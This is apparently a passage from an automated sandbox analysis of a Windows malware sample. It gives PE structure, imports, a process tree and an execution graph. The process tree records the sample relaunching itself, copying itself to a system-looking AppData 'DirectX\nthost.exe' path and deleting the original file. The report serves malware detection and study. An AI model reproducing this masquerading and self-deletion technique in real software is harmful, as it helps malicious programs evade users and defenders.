je 00007F53A0F52C26h
mov eax, dword ptr [esi+08h]

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x9a9c | 0x64 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x14000 | 0x6e6e2 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x83000 | 0x708 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x2b60 | 0x40 | .text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x140 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x91e6 | 0x9200 | False | 0.562018407534 | data | 6.38299044249 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data | 0xb000 | 0x80a0 | 0xe00 | False | 0.196986607143 | data | 2.24335225659 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0x14000 | 0x6e6e2 | 0x6e800 | False | 0.82630885888 | data | 7.96230835772 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x83000 | 0xd12 | 0xe00 | False | 0.443917410714 | data | 4.1795554597 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
BBBAAC | 0x142d8 | 0x583e9 | data | |
RT_BITMAP | 0x6c6c4 | 0x32c8 | data | |
RT_BITMAP | 0x6f98c | 0x3368 | data | |
RT_BITMAP | 0x72cf4 | 0x3354 | data | |
RT_BITMAP | 0x76048 | 0x35f8 | data | |
RT_BITMAP | 0x79640 | 0x3338 | data | |
RT_ICON | 0x7c978 | 0x10a8 | data | |
RT_ICON | 0x7da20 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 64, next free block index 40, 1st item "\015\033\355\375\013\034\353\376\013\033\355\377\013\033\354\375o\031\244\376\316\026_\375\316\025_\376\316\025_\376\316\025_\375\315\025_\375\317\026^\377\315\027]\376\315\027^\375\316\026_\376\315\026_\375\317\025^" | |
RT_MENU | 0x81c48 | 0x468 | data | |
RT_MENU | 0x820b0 | 0x168 | data | |
RT_MENU | 0x82218 | 0x4a6 | data | |
RT_GROUP_ICON | 0x826c0 | 0x22 | MS Windows icon resource - 2 icons, 32x32, 256-colors | |

Imports

DLL | Import
KERNEL32.dll | GetLastError, VirtualProtect, GetCalendarInfoW, GetLocaleInfoW, GetTickCount, GetPrivateProfileSectionNamesA, LocalAlloc, GetModuleHandleW, FlushFileBuffers, CloseHandle, CreateFileW, HeapSize, GetCommandLineW, HeapSetInformation, GetStartupInfoW, DecodePointer, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, EncodePointer, TerminateProcess, GetCurrentProcess, GetProcAddress, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, HeapCreate, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, SetFilePointer, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, EnterCriticalSection, LeaveCriticalSection, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapFree, Sleep, LoadLibraryW, RtlUnwind, SetStdHandle, WriteConsoleW, MultiByteToWideChar, LCMapStringW, GetStringTypeW, HeapAlloc, HeapReAlloc, IsProcessorFeaturePresent
GDI32.dll | GetLogColorSpaceA, ChoosePixelFormat, GetColorSpace, SetICMMode
SHELL32.dll | ExtractIconA, ShellAboutW, ShellExecuteA
WINHTTP.dll | WinHttpConnect, WinHttpCloseHandle

Network Behavior

No network behavior found

Code Manipulations

System Behavior

General

Start time:19:10:13
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe'
Imagebase:0x75a90000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:C, C++ or other language

General

Start time:19:10:17
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe'
Imagebase:0x753f0000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:Borland Delphi

General

Start time:19:10:19
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 0
Imagebase:0x73e10000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:C, C++ or other language

General

Start time:19:10:23
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 0
Imagebase:0x753f0000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:Borland Delphi

General

Start time:19:10:23
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 1
Imagebase:0x73e10000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:C, C++ or other language

General

Start time:19:10:26
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 1
Imagebase:0x753f0000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:Borland Delphi

General

Start time:19:10:26
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 2
Imagebase:0x73e10000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:C, C++ or other language

General

Start time:19:10:29
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 2
Imagebase:0x753f0000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:Borland Delphi

General

Start time:19:10:29
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 3
Imagebase:0x73e10000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:C, C++ or other language

General

Start time:19:10:32
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 3
Imagebase:0x753f0000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:Borland Delphi

General

Start time:19:10:32
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 4
Imagebase:0x73e10000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:C, C++ or other language

General

Start time:19:10:35
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 4
Imagebase:0x753f0000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:Borland Delphi

General

Start time:19:10:35
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 5
Imagebase:0x73e10000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:C, C++ or other language

General

Start time:19:10:38
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 5
Imagebase:0x753f0000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:Borland Delphi

General

Start time:19:10:38
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 6
Imagebase:0x73e10000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:C, C++ or other language

General

Start time:19:10:41
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 6
Imagebase:0x74150000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:Borland Delphi

General

Start time:19:10:41
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 7
Imagebase:0x73e10000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:C, C++ or other language

General

Start time:19:10:44
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 7
Imagebase:0x753f0000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:Borland Delphi

General

Start time:19:10:44
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 8
Imagebase:0x73e10000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:C, C++ or other language

General

Start time:19:10:47
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 8
Imagebase:0x756e0000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:Borland Delphi

General

Start time:19:10:47
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 9
Imagebase:0x73e10000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:C, C++ or other language

General

Start time:19:10:50
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 9
Imagebase:0x753f0000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:Borland Delphi

General

Start time:19:10:50
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 10
Imagebase:0x73e10000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:C, C++ or other language

General

Start time:19:10:53
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 10
Imagebase:0x753f0000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:Borland Delphi

General

Start time:19:10:53
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 11
Imagebase:0x73e10000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:C, C++ or other language

General

Start time:19:10:56
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 11
Imagebase:0x753f0000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:Borland Delphi

General

Start time:19:10:56
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 12
Imagebase:0x73e10000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:C, C++ or other language

General

Start time:19:10:59
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 12
Imagebase:0x753f0000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:Borland Delphi

General

Start time:19:10:59
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 13
Imagebase:0x73e10000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:C, C++ or other language

General

Start time:19:11:02
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 13
Imagebase:0x753f0000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:Borland Delphi

General

Start time:19:11:02
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 14
Imagebase:0x73e10000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:C, C++ or other language

General

Start time:19:11:05
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 14
Imagebase:0x753f0000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:Borland Delphi

General

Start time:19:11:05
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 15
Imagebase:0x73e10000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:C, C++ or other language

General

Start time:19:11:08
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 15
Imagebase:0x753f0000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:Borland Delphi

General

Start time:19:11:08
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 16
Imagebase:0x73e10000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:C, C++ or other language

General

Start time:19:11:11
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 16
Imagebase:0x75a90000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:Borland Delphi

General

Start time:19:11:11
Start date:08/10/2017
Path:C:\Users\user\AppData\Roaming\Microsoft\DirectX\nthost.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\AppData\Roaming\Microsoft\DirectX\nthost.exe' 17 DEL 'C:\Users\user\Desktop\obtG43AWHP.exe'
Imagebase:0x73e10000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:C, C++ or other language
Antivirus matches:
  • Detection: 46%, virustotal

General

Start time:19:11:14
Start date:08/10/2017
Path:C:\Windows\explorer.exe
Wow64 process (32bit):false
Commandline:explorer.exe C:\Users\user\AppData\Roaming\Microsoft\DirectX\nthost.exe
Imagebase:0x75340000
File size:2972672 bytes
MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
Programmed in:C, C++ or other language

General

Start time:19:11:14
Start date:08/10/2017
Path:C:\Users\user\AppData\Roaming\Microsoft\DirectX\nthost.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\AppData\Roaming\Microsoft\DirectX\nthost.exe' 17 DEL 'C:\Users\user\Desktop\obtG43AWHP.exe'
Imagebase:0x753b0000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:Borland Delphi

Disassembly

Code Analysis

    Execution Graph

    Execution Coverage:3.9%
    Dynamic/Decrypted Code Coverage:30.6%
    Signature Coverage:5.8%
    Total number of Nodes:967
    Total number of Limit Nodes:18

    Graph

calls 19258->19259 19260 30085b9 19259->19260 19261 3006891 __freea 66 API calls 19260->19261 19262 30085c1 19261->19262 19263 3006891 __freea 66 API calls 19262->19263 19264 30085c9 19263->19264 19265 3006891 __freea 66 API calls 19264->19265 19266 30085d1 19265->19266 19267 3006891 __freea 66 API calls 19266->19267 19268 30085d9 19267->19268 19269 3006891 __freea 66 API calls 19268->19269 19270 30085e1 19269->19270 19271 3006891 __freea 66 API calls 19270->19271 19272 30085e9 19271->19272 19273 3006891 __freea 66 API calls 19272->19273 19274 30085f1 19273->19274 19275 3006891 __freea 66 API calls 19274->19275 19276 30085ff 19275->19276 19277 3006891 __freea 66 API calls 19276->19277 19278 300860a 19277->19278 19279 3006891 __freea 66 API calls 19278->19279 19280 3008615 19279->19280 19281 3006891 __freea 66 API calls 19280->19281 19282 3008620 19281->19282 19283 3006891 __freea 66 API calls 19282->19283 19284 300862b 19283->19284 19285 3006891 __freea 66 API calls 19284->19285 19286 3008636 19285->19286 19287 3006891 __freea 66 API calls 19286->19287 19288 3008641 19287->19288 19289 3006891 __freea 66 API calls 19288->19289 19290 300864c 19289->19290 19291 3006891 __freea 66 API calls 19290->19291 19292 3008657 19291->19292 19293 3006891 __freea 66 API calls 19292->19293 19294 3008662 19293->19294 19295 3006891 __freea 66 API calls 19294->19295 19296 300866d 19295->19296 19297 3006891 __freea 66 API calls 19296->19297 19298 3008678 19297->19298 19299 3006891 __freea 66 API calls 19298->19299 19300 3008683 19299->19300 19301 3006891 __freea 66 API calls 19300->19301 19302 300868e 19301->19302 19303 3006891 __freea 66 API calls 19302->19303 19304 3008699 19303->19304 19305 3006891 __freea 66 API calls 19304->19305 19306 30086a4 19305->19306 19307 3006891 __freea 66 API calls 19306->19307 19308 30086b2 19307->19308 19309 3006891 __freea 66 API calls 19308->19309 19310 30086bd 19309->19310 19311 3006891 __freea 66 API calls 19310->19311 19312 30086c8 19311->19312 
19313 3006891 __freea 66 API calls 19312->19313 19314 30086d3 19313->19314 19315 3006891 __freea 66 API calls 19314->19315 19316 30086de 19315->19316 19317 3006891 __freea 66 API calls 19316->19317 19318 30086e9 19317->19318 19319 3006891 __freea 66 API calls 19318->19319 19320 30086f4 19319->19320 19321 3006891 __freea 66 API calls 19320->19321 19322 30086ff 19321->19322 19323 3006891 __freea 66 API calls 19322->19323 19324 300870a 19323->19324 19325 3006891 __freea 66 API calls 19324->19325 19326 3008715 19325->19326 19327 3006891 __freea 66 API calls 19326->19327 19328 3008720 19327->19328 19329 3006891 __freea 66 API calls 19328->19329 19330 300872b 19329->19330 19331 3006891 __freea 66 API calls 19330->19331 19332 3008736 19331->19332 19333 3006891 __freea 66 API calls 19332->19333 19334 3008741 19333->19334 19335 3006891 __freea 66 API calls 19334->19335 19336 300874c 19335->19336 19337 3006891 __freea 66 API calls 19336->19337 19338 3008757 19337->19338 19339 3006891 __freea 66 API calls 19338->19339 19340 3008765 19339->19340 19341 3006891 __freea 66 API calls 19340->19341 19342 3008770 19341->19342 19343 3006891 __freea 66 API calls 19342->19343 19344 300877b 19343->19344 19345 3006891 __freea 66 API calls 19344->19345 19346 3008786 19345->19346 19347 3006891 __freea 66 API calls 19346->19347 19348 3008791 19347->19348 19349 3006891 __freea 66 API calls 19348->19349 19350 300879c 19349->19350 19351 3006891 __freea 66 API calls 19350->19351 19352 30087a7 19351->19352 19353 3006891 __freea 66 API calls 19352->19353 19354 30087b2 19353->19354 19355 3006891 __freea 66 API calls 19354->19355 19356 30087bd 19355->19356 19357 3006891 __freea 66 API calls 19356->19357 19358 30087c8 19357->19358 19359 3006891 __freea 66 API calls 19358->19359 19360 30087d3 19359->19360 19361 3006891 __freea 66 API calls 19360->19361 19362 30087de 19361->19362 19363 3006891 __freea 66 API calls 19362->19363 19364 30087e9 19363->19364 19365 3006891 __freea 66 API calls 19364->19365 
19366 30087f4 19365->19366 19367 3006891 __freea 66 API calls 19366->19367 19368 30087ff 19367->19368 19369 3006891 __freea 66 API calls 19368->19369 19370 300880a 19369->19370 19371 3006891 __freea 66 API calls 19370->19371 19372 3008818 19371->19372 19373 3006891 __freea 66 API calls 19372->19373 19374 3008823 19373->19374 19375 3006891 __freea 66 API calls 19374->19375 19376 300882e 19375->19376 19377 3006891 __freea 66 API calls 19376->19377 19378 3008839 19377->19378 19379 3006891 __freea 66 API calls 19378->19379 19380 3008844 19379->19380 19381 3006891 __freea 66 API calls 19380->19381 19381->19382 19382->19152 19383->19124 19387 3006db5 LeaveCriticalSection 19384->19387 19386 3006139 19386->19102 19387->19386 19389 3005c5f 19388->19389 19390 3005c50 19388->19390 19392 3003ea5 __freea 66 API calls 19389->19392 19393 3005c7d 19389->19393 19391 3003ea5 __freea 66 API calls 19390->19391 19395 3005c55 19391->19395 19394 3005c70 19392->19394 19393->19057 19396 3003e53 __cftof 11 API calls 19394->19396 19395->19057 19396->19395 19398 30068ee __getbuf 66 API calls 19397->19398 19399 3005c0f 19398->19399 19399->19049 19401 3005b32 __CxxUnhandledExceptionFilter 19400->19401 19402 3005b3a 19401->19402 19406 3005b55 19401->19406 19450 3003eb8 19402->19450 19404 3005b61 19407 3003eb8 66 API calls 19404->19407 19406->19404 19408 3005b9b 19406->19408 19410 3005b66 19407->19410 19453 3007cd1 19408->19453 19409 3003ea5 __freea 66 API calls 19420 3005b47 __CxxUnhandledExceptionFilter 19409->19420 19412 3003ea5 __freea 66 API calls 19410->19412 19414 3005b6e 19412->19414 19413 3005ba1 19415 3005baf 19413->19415 19416 3005bc3 19413->19416 19417 3003e53 __cftof 11 API calls 19414->19417 19463 3005429 19415->19463 19419 3003ea5 __freea 66 API calls 19416->19419 19417->19420 19421 3005bc8 19419->19421 19420->19048 19422 3003eb8 66 API calls 19421->19422 19423 3005bbb 19422->19423 19522 3005bf2 19423->19522 19426 300534b __CxxUnhandledExceptionFilter 19425->19426 19427 300535c 
19426->19427 19430 3005378 19426->19430 19429 3003eb8 66 API calls 19427->19429 19428 3005384 19431 3003eb8 66 API calls 19428->19431 19432 3005361 19429->19432 19430->19428 19434 30053be 19430->19434 19433 3005389 19431->19433 19435 3003ea5 __freea 66 API calls 19432->19435 19436 3003ea5 __freea 66 API calls 19433->19436 19437 3007cd1 68 API calls 19434->19437 19446 3005369 __CxxUnhandledExceptionFilter 19435->19446 19438 3005391 19436->19438 19439 30053c4 19437->19439 19440 3003e53 __cftof 11 API calls 19438->19440 19441 30053ee 19439->19441 19442 30053d2 19439->19442 19440->19446 19443 3003ea5 __freea 66 API calls 19441->19443 19444 30052ba 68 API calls 19442->19444 19445 30053f3 19443->19445 19447 30053e3 19444->19447 19448 3003eb8 66 API calls 19445->19448 19446->19048 19561 300541f 19447->19561 19448->19447 19451 3004cc7 __getptd 66 API calls 19450->19451 19452 3003ebd 19451->19452 19452->19409 19454 3007cdd __CxxUnhandledExceptionFilter 19453->19454 19455 3007d37 19454->19455 19458 3006e8e ___crtLCMapStringA 66 API calls 19454->19458 19456 3007d3c EnterCriticalSection 19455->19456 19457 3007d59 __CxxUnhandledExceptionFilter 19455->19457 19456->19457 19457->19413 19459 3007d09 19458->19459 19460 3007d12 InitializeCriticalSectionAndSpinCount 19459->19460 19462 3007d25 19459->19462 19460->19462 19525 3007d67 19462->19525 19464 3005438 19463->19464 19465 300546e 19464->19465 19468 300548d 19464->19468 19496 3005463 19464->19496 19467 3003eb8 66 API calls 19465->19467 19466 3006ba0 setSBUpLow 5 API calls 19470 3005b24 19466->19470 19471 3005473 19467->19471 19469 30054cc 19468->19469 19474 30054e9 19468->19474 19472 3003eb8 66 API calls 19469->19472 19470->19423 19473 3003ea5 __freea 66 API calls 19471->19473 19475 30054d1 19472->19475 19477 300547a 19473->19477 19480 30054fc 19474->19480 19529 30052ba 19474->19529 19479 3003ea5 __freea 66 API calls 19475->19479 19482 3003e53 __cftof 11 API calls 19477->19482 19478 3005c43 66 API calls 19481 3005505 19478->19481 
19483 30054d9 19479->19483 19480->19478 19484 30057a7 19481->19484 19488 3004d40 __getptd 66 API calls 19481->19488 19482->19496 19485 3003e53 __cftof 11 API calls 19483->19485 19486 3005a57 WriteFile 19484->19486 19487 30057b6 19484->19487 19485->19496 19489 3005a8a GetLastError 19486->19489 19515 3005789 19486->19515 19490 3005871 19487->19490 19505 30057c9 19487->19505 19491 3005520 GetConsoleMode 19488->19491 19489->19515 19492 300587e 19490->19492 19502 300594b 19490->19502 19491->19484 19493 3005549 19491->19493 19494 3005ad5 19492->19494 19500 30058ed WriteFile 19492->19500 19492->19515 19493->19484 19495 3005559 GetConsoleCP 19493->19495 19494->19496 19499 3003ea5 __freea 66 API calls 19494->19499 19495->19515 19521 300557c 19495->19521 19496->19466 19497 3005aa8 19503 3005ac7 19497->19503 19504 3005ab3 19497->19504 19498 3005813 WriteFile 19498->19489 19498->19505 19506 3005af8 19499->19506 19500->19489 19500->19492 19501 30059bc WideCharToMultiByte 19501->19489 19508 30059f3 WriteFile 19501->19508 19502->19494 19502->19501 19502->19508 19502->19515 19542 3003ecb 19503->19542 19507 3003ea5 __freea 66 API calls 19504->19507 19505->19494 19505->19498 19505->19515 19510 3003eb8 66 API calls 19506->19510 19511 3005ab8 19507->19511 19508->19502 19512 3005a2a GetLastError 19508->19512 19510->19496 19513 3003eb8 66 API calls 19511->19513 19512->19502 19513->19496 19515->19494 19515->19496 19515->19497 19516 3007d97 WriteConsoleW CreateFileW 19516->19521 19517 3005628 WideCharToMultiByte 19517->19515 19519 3005659 WriteFile 19517->19519 19518 3007eef 78 API calls __Stoull 19518->19521 19519->19489 19519->19521 19520 30056ad WriteFile 19520->19489 19520->19521 19521->19489 19521->19515 19521->19516 19521->19517 19521->19518 19521->19520 19539 3006b8d 19521->19539 19560 3007d70 LeaveCriticalSection 19522->19560 19524 3005bf8 19524->19420 19528 3006db5 LeaveCriticalSection 19525->19528 19527 3007d6e 19527->19455 19528->19527 19547 3007c68 19529->19547 19531 30052d8 
19532 30052e0 19531->19532 19533 30052f1 SetFilePointer 19531->19533 19534 3003ea5 __freea 66 API calls 19532->19534 19535 3005309 GetLastError 19533->19535 19536 30052e5 19533->19536 19534->19536 19535->19536 19537 3005313 19535->19537 19536->19480 19538 3003ecb 66 API calls 19537->19538 19538->19536 19540 3006b55 __isleadbyte_l 76 API calls 19539->19540 19541 3006b9c 19540->19541 19541->19521 19543 3003eb8 66 API calls 19542->19543 19544 3003ed6 __freea 19543->19544 19545 3003ea5 __freea 66 API calls 19544->19545 19546 3003ee9 19545->19546 19546->19496 19548 3007c8d 19547->19548 19549 3007c75 19547->19549 19552 3003eb8 66 API calls 19548->19552 19554 3007ccc 19548->19554 19550 3003eb8 66 API calls 19549->19550 19551 3007c7a 19550->19551 19553 3003ea5 __freea 66 API calls 19551->19553 19555 3007c9e 19552->19555 19559 3007c82 19553->19559 19554->19531 19556 3003ea5 __freea 66 API calls 19555->19556 19557 3007ca6 19556->19557 19558 3003e53 __cftof 11 API calls 19557->19558 19558->19559 19559->19531 19560->19524 19564 3007d70 LeaveCriticalSection 19561->19564 19563 3005427 19563->19446 19564->19563

    Executed Functions

    C-Code - Quality: 73%
    			E0300966F(void* __eflags) {
    				char _v5;
    				long _v12;
    				long _v16;
    				int _v20;
    				int _v24;
    				char _v28;
    				void* _v32;
    				struct tagPIXELFORMATDESCRIPTOR _v72;
    				void* _t41;
    				long _t47;
    				int _t49;
    				void* _t50;
